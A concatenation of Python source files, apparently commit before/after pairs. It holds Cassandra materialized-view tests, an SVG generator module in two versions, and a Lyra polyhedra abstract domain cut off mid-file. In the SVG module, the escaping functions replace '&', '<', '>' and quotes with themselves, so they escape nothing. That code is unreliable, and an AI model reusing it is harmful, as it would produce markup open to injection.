node4.stop()
node5.stop()
debug('Start nodes 2 and 3')
node2.start()
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
session2 = self.patient_cql_connection(node2)
session2.execute('USE ks')
debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
debug('Write new data in node2 that overlap those in node1')
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
self._replay_batchlogs()
assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
debug("Composite delete of everything")
session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
self._replay_batchlogs()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
debug('Wait for batchlogs to expire from node2 and node3')
time.sleep(5)
debug('Start remaining nodes')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
node4.start(wait_other_notice=True, wait_for_binary_proto=True)
node5.start(wait_other_notice=True, wait_for_binary_proto=True)
# at this point the data isn't repaired so we have an inconsistency.
# this value should return None
assert_all(
session2,
"SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
cl=ConsistencyLevel.QUORUM
)
debug('Run global repair on node1')
node1.repair()
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def complex_mv_select_statements_test(self):
"""
Test complex MV select statements
@jira_ticket CASSANDRA-9664
"""
cluster = self.cluster
cluster.populate(3).start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
debug("Creating keyspace")
session.execute("CREATE KEYSPACE mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
session.execute('USE mvtest')
mv_primary_keys = ["((a, b), c)",
"((b, a), c)",
"(a, b, c)",
"(c, b, a)",
"((c, a), b)"]
for mv_primary_key in mv_primary_keys:
session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")
insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
session.cluster.control_connection.wait_for_schema_agreement()
rows = [(0, 0, 0, 0),
(0, 0, 1, 0),
(0, 1, 0, 0),
(0, 1, 1, 0),
(1, 0, 0, 0),
(1, 0, 1, 0),
(1, 1, -1, 0),
(1, 1, 0, 0),
(1, 1, 1, 0)]
for row in rows:
session.execute(insert_stmt, row)
debug("Testing MV primary key: {}".format(mv_primary_key))
session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
"a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
time.sleep(3)
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new rows that does not match the filter
session.execute(insert_stmt, (0, 0, 1, 0))
session.execute(insert_stmt, (1, 1, 0, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# insert new row that does match the filter
session.execute(insert_stmt, (1, 2, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update rows that does not match the filter
session.execute(update_stmt, (1, 1, -1, 0))
session.execute(update_stmt, (0, 1, 1, 0))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# update a row that does match the filter
session.execute(update_stmt, (2, 1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete rows that does not match the filter
session.execute(delete_stmt1, (1, 1, -1))
session.execute(delete_stmt1, (2, 0, 1))
session.execute(delete_stmt2, (0,))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a row that does match the filter
session.execute(delete_stmt1, (1, 1, 1))
assert_all(
session, "SELECT a, b, c, d FROM mv",
[[1, 0, 1, 0], [1, 2, 1, 0]],
ignore_order=True,
cl=ConsistencyLevel.QUORUM
)
# delete a partition that matches the filter
session.execute(delete_stmt2, (1,))
assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)
# Cleanup
session.execute("DROP MATERIALIZED VIEW mv")
session.execute("DROP TABLE test")
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) / num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print str(e)
queue.close()
@since('3.0')
@skipIf(sys.platform == 'win32', 'Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in self.exception_type.keys():
output = "{} ({}: {})".format(output, key, self.exception_type[key])
sys.stdout.write(output)
sys.stdout.flush()
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
sys.stdout.write(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
sys.stdout.write(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
sys.stdout.flush()
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print traceback.format_exception_only(type(e), e)
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
def single_partition_consistent_reads_after_write_test(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def multi_partition_consistent_reads_after_write_test(self):
"""
Tests consistency of multiple writes to a multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(20)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
[node1, node2, node3] = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) / processes
debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
debug("Writing data to base table")
for i in range(upper / 10):
self._do_row(insert1, i, num_partitions)
debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
debug("Writing more data to base table")
for i in range(upper / 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
debug("Finished writes, now verifying reads")
self._populate_rows()
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = self.get_ip_from_node(node2)
p = Process(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
p.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
mm = queues[i % processes].get()
if not mm.out() is None:
sys.stdout.write("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
sys.stdout.write("\n")
sys.stdout.flush()
|
# -*- coding: utf-8 -*-
# Copyright 2011 Takeshi KOMIYA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import cStringIO
def _escape(s):
s = str(s)
return s.replace("&", "&").replace("<", "<").replace(">", ">")
def _quote(s):
return '"%s"' % _escape(s).replace('"', """)
class base(object):
def __init__(self, *args, **kwargs):
self.text = None
self.elements = []
self.attributes = {}
for key, value in kwargs.items():
self.add_attribute(key, value)
def add_attribute(self, key, value):
setter = 'set_%s' % key
if hasattr(self, setter):
getattr(self, setter)(value)
else:
key = re.sub('_', '-', key)
self.attributes[key] = value
def addElement(self, element):
self.elements.append(element)
def set_text(self, text):
self.text = text
def to_xml(self, io, level=0):
clsname = self.__class__.__name__
indent = ' ' * level
io.write('%s<%s' % (indent, clsname))
for key in sorted(self.attributes):
value = self.attributes[key]
if value is not None:
io.write(' %s=%s' % (_escape(key), _quote(value)))
if self.elements == [] and self.text is None:
io.write(" />\n")
elif self.text is not None:
io.write(">%s</%s>\n" % (_escape(self.text), clsname))
elif self.elements:
io.write(">\n")
for e in self.elements:
e.to_xml(io, level + 1)
io.write('%s</%s>\n' % (indent, clsname))
class element(base):
def __init__(self, x, y, width=None, height=None, *args, **kwargs):
super(element, self).__init__(*args, **kwargs)
self.attributes['x'] = x
self.attributes['y'] = y
if width is not None:
self.attributes['width'] = width
if height is not None:
self.attributes['height'] = height
class svg(base):
def __init__(self, x, y, width, height):
viewbox = "%d %d %d %d" % (x, y, width, height)
super(svg, self).__init__(viewBox=viewbox)
self.use_doctype = True
self.add_attribute('xmlns', 'http://www.w3.org/2000/svg')
def to_xml(self):
io = cStringIO.StringIO()
if self.use_doctype:
url = "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"
io.write("<?xml version='1.0' encoding='UTF-8'?>\n")
io.write('<!DOCTYPE svg PUBLIC '
'"-//W3C//DTD SVG 1.0//EN" "%s">\n' % url)
super(svg, self).to_xml(io)
return io.getvalue()
class title(base):
def __init__(self, _title):
super(title, self).__init__(text=_title)
class text(element):
def __init__(self, x, y, _text, **kwargs):
super(text, self).__init__(x, y, text=_text, **kwargs)
class rect(element):
pass
class ellipse(base):
def __init__(self, cx, cy, rx, ry, **kwargs):
super(ellipse, self).__init__(cx=cx, cy=cy, rx=rx, ry=ry, **kwargs)
class image(element):
def __init__(self, uri, x, y, width, height, **kwargs):
super(image, self).__init__(x, y, width, height, **kwargs)
class polygon(base):
def __init__(self, points, **kwargs):
xylist = " ".join('%d,%d' % pt for pt in points)
super(polygon, self).__init__(points=xylist, **kwargs)
class path(base):
def __init__(self, data, **kwargs):
super(path, self).__init__(d=data, **kwargs)
class pathdata:
def __init__(self, x=None, y=None):
self.path = []
if x is not None and y is not None:
self.move(x, y)
def closepath(self):
self.path.append('z')
def move(self, x, y):
self.path.append('M %s %s' % (x, y))
def relmove(self, x, y):
self.path.append('m %s %s' % (x, y))
def line(self, x, y):
self.path.append('L %s %s' % (x, y))
def relline(self, x, y):
self.path.append('l %s %s' % (x, y))
def hline(self, x):
self.path.append('H%s' % (x,))
def relhline(self, x):
self.path.append('h%s %s' % (x,))
def vline(self, y):
self.path.append('V%s' % (y,))
def relvline(self, y):
self.path.append('v%s' % (y,))
def bezier(self, x1, y1, x2, y2, x, y):
self.path.append('C%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))
def relbezier(self, x1, y1, x2, y2, x, y):
self.path.append('c%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))
def smbezier(self, x2, y2, x, y):
self.path.append('S%s,%s %s,%s' % (x2, y2, x, y))
def relsmbezier(self, x2, y2, x, y):
self.path.append('s%s,%s %s,%s' % (x2, y2, x, y))
def qbezier(self, x1, y1, x, y):
self.path.append('Q%s,%s %s,%s' % (x1, y1, x, y))
def qrelbezier(self, x1, y1, x, y):
self.path.append('q%s,%s %s,%s' % (x1, y1, x, y))
def smqbezier(self, x, y):
self.path.append('T%s %s' % (x, y))
def relsmqbezier(self, x, y):
self.path.append('t%s %s' % (x, y))
def ellarc(self, rx, ry, xrot, laf, sf, x, y):
self.path.append('A%s,%s %s %s %s %s %s' % \
(rx, ry, xrot, laf, sf, x, y))
def relellarc(self, rx, ry, xrot, laf, sf, x, y):
self.path.append('a%s,%s %s %s %s %s %s' % \
(rx, ry, xrot, laf, sf, x, y))
def __repr__(self):
return ' '.join(self.path)
class defs(base):
pass
class filter(element):
def __init__(self, x, y, width, height, **kwargs):
super(filter, self).__init__(x, y, width, height, **kwargs)
def svgclass(name):
""" svg class generating function """
return type(name, (base,), {})
* Fix error with multibyte characters
# -*- coding: utf-8 -*-
# Copyright 2011 Takeshi KOMIYA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import cStringIO
def _escape(s):
if not isinstance(s, (str, unicode)):
s = str(s)
return s.replace("&", "&").replace("<", "<").replace(">", ">")
def _quote(s):
return '"%s"' % _escape(s).replace('"', """)
class base(object):
def __init__(self, *args, **kwargs):
self.text = None
self.elements = []
self.attributes = {}
for key, value in kwargs.items():
self.add_attribute(key, value)
def add_attribute(self, key, value):
setter = 'set_%s' % key
if hasattr(self, setter):
getattr(self, setter)(value)
else:
key = re.sub('_', '-', key)
self.attributes[key] = value
def addElement(self, element):
self.elements.append(element)
def set_text(self, text):
self.text = text
def to_xml(self, io, level=0):
clsname = self.__class__.__name__
indent = ' ' * level
io.write('%s<%s' % (indent, clsname))
for key in sorted(self.attributes):
value = self.attributes[key]
if value is not None:
io.write(' %s=%s' % (_escape(key), _quote(value)))
if self.elements == [] and self.text is None:
io.write(" />\n")
elif self.text is not None:
text = _escape(self.text).encode('utf-8')
io.write(">%s</%s>\n" % (text, clsname))
elif self.elements:
io.write(">\n")
for e in self.elements:
e.to_xml(io, level + 1)
io.write('%s</%s>\n' % (indent, clsname))
class element(base):
def __init__(self, x, y, width=None, height=None, *args, **kwargs):
super(element, self).__init__(*args, **kwargs)
self.attributes['x'] = x
self.attributes['y'] = y
if width is not None:
self.attributes['width'] = width
if height is not None:
self.attributes['height'] = height
class svg(base):
def __init__(self, x, y, width, height):
viewbox = "%d %d %d %d" % (x, y, width, height)
super(svg, self).__init__(viewBox=viewbox)
self.use_doctype = True
self.add_attribute('xmlns', 'http://www.w3.org/2000/svg')
def to_xml(self):
io = cStringIO.StringIO()
if self.use_doctype:
url = "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"
io.write("<?xml version='1.0' encoding='UTF-8'?>\n")
io.write('<!DOCTYPE svg PUBLIC '
'"-//W3C//DTD SVG 1.0//EN" "%s">\n' % url)
super(svg, self).to_xml(io)
return io.getvalue()
class title(base):
def __init__(self, _title):
super(title, self).__init__(text=_title)
class text(element):
def __init__(self, x, y, _text, **kwargs):
super(text, self).__init__(x, y, text=_text, **kwargs)
class rect(element):
pass
class ellipse(base):
def __init__(self, cx, cy, rx, ry, **kwargs):
super(ellipse, self).__init__(cx=cx, cy=cy, rx=rx, ry=ry, **kwargs)
class image(element):
def __init__(self, uri, x, y, width, height, **kwargs):
super(image, self).__init__(x, y, width, height, **kwargs)
class polygon(base):
def __init__(self, points, **kwargs):
xylist = " ".join('%d,%d' % pt for pt in points)
super(polygon, self).__init__(points=xylist, **kwargs)
class path(base):
def __init__(self, data, **kwargs):
super(path, self).__init__(d=data, **kwargs)
class pathdata:
def __init__(self, x=None, y=None):
self.path = []
if x is not None and y is not None:
self.move(x, y)
def closepath(self):
self.path.append('z')
def move(self, x, y):
self.path.append('M %s %s' % (x, y))
def relmove(self, x, y):
self.path.append('m %s %s' % (x, y))
def line(self, x, y):
self.path.append('L %s %s' % (x, y))
def relline(self, x, y):
self.path.append('l %s %s' % (x, y))
def hline(self, x):
self.path.append('H%s' % (x,))
def relhline(self, x):
self.path.append('h%s %s' % (x,))
def vline(self, y):
self.path.append('V%s' % (y,))
def relvline(self, y):
self.path.append('v%s' % (y,))
def bezier(self, x1, y1, x2, y2, x, y):
self.path.append('C%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))
def relbezier(self, x1, y1, x2, y2, x, y):
self.path.append('c%s,%s %s,%s %s,%s' % (x1, y1, x2, y2, x, y))
def smbezier(self, x2, y2, x, y):
self.path.append('S%s,%s %s,%s' % (x2, y2, x, y))
def relsmbezier(self, x2, y2, x, y):
self.path.append('s%s,%s %s,%s' % (x2, y2, x, y))
def qbezier(self, x1, y1, x, y):
self.path.append('Q%s,%s %s,%s' % (x1, y1, x, y))
def qrelbezier(self, x1, y1, x, y):
self.path.append('q%s,%s %s,%s' % (x1, y1, x, y))
def smqbezier(self, x, y):
self.path.append('T%s %s' % (x, y))
def relsmqbezier(self, x, y):
self.path.append('t%s %s' % (x, y))
def ellarc(self, rx, ry, xrot, laf, sf, x, y):
self.path.append('A%s,%s %s %s %s %s %s' % \
(rx, ry, xrot, laf, sf, x, y))
def relellarc(self, rx, ry, xrot, laf, sf, x, y):
self.path.append('a%s,%s %s %s %s %s %s' % \
(rx, ry, xrot, laf, sf, x, y))
def __repr__(self):
return ' '.join(self.path)
class defs(base):
pass
class filter(element):
def __init__(self, x, y, width, height, **kwargs):
super(filter, self).__init__(x, y, width, height, **kwargs)
def svgclass(name):
""" svg class generating function """
return type(name, (base,), {})
|
"""
Polyhedra Abstract Domain
=========================
Relational abstract domain to be used for **numerical analysis**.
The set of possible numerical values of a program variable in a program state
is represented by a conjunction of linear constraints.
:Authors: Caterina Urban
"""
from copy import deepcopy
from typing import Set, Union
from apronpy.coeff import PyMPQScalarCoeff, PyMPQIntervalCoeff
from apronpy.environment import PyEnvironment
from apronpy.interval import PyMPQInterval
from apronpy.lincons0 import ConsTyp
from apronpy.polka import PyPolkaMPQstrict
from apronpy.tcons1 import PyTcons1Array, PyTcons1
from apronpy.texpr0 import TexprOp, TexprRtype, TexprRdir
from apronpy.texpr1 import PyTexpr1
from apronpy.var import PyVar
from lyra.abstract_domains.state import State
from lyra.core.expressions import VariableIdentifier, Expression, BinaryBooleanOperation, \
BinaryComparisonOperation, NegationFreeExpression, Literal, Input, UnaryArithmeticOperation, \
BinaryArithmeticOperation
from lyra.core.utils import copy_docstring
def lyra2apron(environment, expression: Expression, usub = False) -> Union[PyTexpr1, PyTcons1]:
if isinstance(expression, Literal):
if usub:
cst = PyMPQScalarCoeff(-float(expression.val))
else:
cst = PyMPQScalarCoeff(float(expression.val))
return PyTexpr1.cst(environment, cst)
elif isinstance(expression, VariableIdentifier):
assert not usub
variable = PyVar(expression.name)
return PyTexpr1.var(environment, variable)
elif isinstance(expression, Input):
assert not usub
expr = PyMPQIntervalCoeff(PyMPQInterval.top())
return PyTexpr1.cst(environment, expr)
elif isinstance(expression, UnaryArithmeticOperation):
usub = expression.operator == UnaryArithmeticOperation.Operator.Sub
return lyra2apron(environment, expression.expression, usub)
elif isinstance(expression, BinaryArithmeticOperation):
assert not usub
expr1 = lyra2apron(environment, expression.left)
expr2 = lyra2apron(environment, expression.right)
op2op = {
BinaryArithmeticOperation.Operator.Add: TexprOp.AP_TEXPR_ADD,
BinaryArithmeticOperation.Operator.Sub: TexprOp.AP_TEXPR_SUB,
BinaryArithmeticOperation.Operator.Mult: TexprOp.AP_TEXPR_MUL,
BinaryArithmeticOperation.Operator.Div: TexprOp.AP_TEXPR_DIV
}
op = op2op[expression.operator]
return PyTexpr1.binop(op, expr1, expr2, TexprRtype.AP_RTYPE_REAL, TexprRdir.AP_RDIR_RND)
elif isinstance(expression, BinaryComparisonOperation):
assert not usub
# assert expression.left.typ == expression.right.typ
typ = expression.left.typ
left = expression.left
right = expression.right
sub = BinaryArithmeticOperation.Operator.Sub
if expression.operator == BinaryComparisonOperation.Operator.GtE:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
elif expression.operator == BinaryComparisonOperation.Operator.Gt:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
elif expression.operator == BinaryComparisonOperation.Operator.LtE:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
elif expression.operator == BinaryComparisonOperation.Operator.Lt:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
raise NotImplementedError(f"lyra2apron conversion for {expression} is not yet supported!")
class PolyhedraState(State):
"""Polyhedra analysis state. An element of the polyhedra abstract domain.
Conjunction of linear constraints constraining the value of each variable.
The value of all program variables is unconstrained by default.
.. note:: Program variables storing collections are abstracted via summarization.
.. document private methods
.. automethod:: PolyhedraState._assign
.. automethod:: PolyhedraState._assume
.. automethod:: PolyhedraState._output
.. automethod:: PolyhedraState._substitute
"""
def __init__(self, variables: Set[VariableIdentifier], precursory: State = None):
super().__init__(precursory=precursory)
r_vars = list()
for variable in variables:
r_vars.append(PyVar(variable.name))
self.environment = PyEnvironment([], r_vars)
self.polka = PyPolkaMPQstrict(self.environment)
@copy_docstring(State.bottom)
def bottom(self):
self.polka = PyPolkaMPQstrict.bottom(self.environment)
return self
@copy_docstring(State.top)
def top(self):
self.polka = PyPolkaMPQstrict.top(self.environment)
return self
def __repr__(self):
if self.is_bottom():
return "⊥"
return str(self.polka)
@copy_docstring(State.is_bottom)
def is_bottom(self) -> bool:
return self.polka.is_bottom()
@copy_docstring(State.is_top)
def is_top(self) -> bool:
return self.polka.is_top()
@copy_docstring(State._less_equal)
def _less_equal(self, other: 'PolyhedraState') -> bool:
return self.polka <= other.polka
@copy_docstring(State._join)
def _join(self, other: 'PolyhedraState') -> 'PolyhedraState':
self.polka = self.polka.join(other.polka)
return self
@copy_docstring(State._meet)
def _meet(self, other: 'PolyhedraState') -> 'PolyhedraState':
self.polka = self.polka.meet(other.polka)
return self
@copy_docstring(State._widening)
def _widening(self, other: 'PolyhedraState') -> 'PolyhedraState':
self.polka = self.polka.widening(other.polka)
return self
@copy_docstring(State._assign)
def _assign(self, left: Expression, right: Expression) -> 'PolyhedraState':
if isinstance(left, VariableIdentifier):
expr = lyra2apron(self.environment, right)
self.polka = self.polka.assign(PyVar(left.name), expr)
return self
raise NotImplementedError(f"Assignment to {left.__class__.__name__} is unsupported!")
@copy_docstring(State._assume)
def _assume(self, condition: Expression, bwd: bool = False) -> 'PolyhedraState':
normal = NegationFreeExpression().visit(condition)
if isinstance(normal, BinaryBooleanOperation):
if normal.operator == BinaryBooleanOperation.Operator.And:
right = deepcopy(self)._assume(normal.right, bwd=bwd)
return self._assume(normal.left, bwd=bwd).meet(right)
if normal.operator == BinaryBooleanOperation.Operator.Or:
right = deepcopy(self)._assume(normal.right, bwd=bwd)
return self._assume(normal.left, bwd=bwd).join(right)
elif isinstance(normal, BinaryComparisonOperation):
cond = lyra2apron(self.environment, normal)
self.polka = self.polka.meet(PyTcons1Array([cond.tcons1]))
return self
raise NotImplementedError(f"Assumption of {normal.__class__.__name__} is unsupported!")
@copy_docstring(State.enter_if)
def enter_if(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.exit_if)
def exit_if(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.enter_loop)
def enter_loop(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.exit_loop)
def exit_loop(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.output)
def _output(self, output: Expression) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State._substitute)
def _substitute(self, left: Expression, right: Expression) -> 'PolyhedraState':
if isinstance(left, VariableIdentifier):
expr = lyra2apron(self.environment, right)
self.polka = self.polka.substitute(PyVar(left.name), expr)
return self
raise NotImplementedError(f"Substitution of {left.__class__.__name__} is unsupported!")
fix polyhedra domain after apronpy update
"""
Polyhedra Abstract Domain
=========================
Relational abstract domain to be used for **numerical analysis**.
The set of possible numerical values of a program variable in a program state
is represented by a conjunction of linear constraints.
:Authors: Caterina Urban
"""
from copy import deepcopy
from typing import Set, Union
from apronpy.coeff import PyMPQScalarCoeff, PyMPQIntervalCoeff
from apronpy.environment import PyEnvironment
from apronpy.interval import PyMPQInterval
from apronpy.lincons0 import ConsTyp
from apronpy.polka import PyPolkaMPQstrict
from apronpy.tcons1 import PyTcons1Array, PyTcons1
from apronpy.texpr0 import TexprOp, TexprRtype, TexprRdir
from apronpy.texpr1 import PyTexpr1
from apronpy.var import PyVar
from lyra.abstract_domains.state import State
from lyra.core.expressions import VariableIdentifier, Expression, BinaryBooleanOperation, \
BinaryComparisonOperation, NegationFreeExpression, Literal, Input, UnaryArithmeticOperation, \
BinaryArithmeticOperation
from lyra.core.utils import copy_docstring
def lyra2apron(environment, expression: Expression, usub = False) -> Union[PyTexpr1, PyTcons1]:
if isinstance(expression, Literal):
if usub:
cst = PyMPQScalarCoeff(-float(expression.val))
else:
cst = PyMPQScalarCoeff(float(expression.val))
return PyTexpr1.cst(environment, cst)
elif isinstance(expression, VariableIdentifier):
assert not usub
variable = PyVar(expression.name)
return PyTexpr1.var(environment, variable)
elif isinstance(expression, Input):
assert not usub
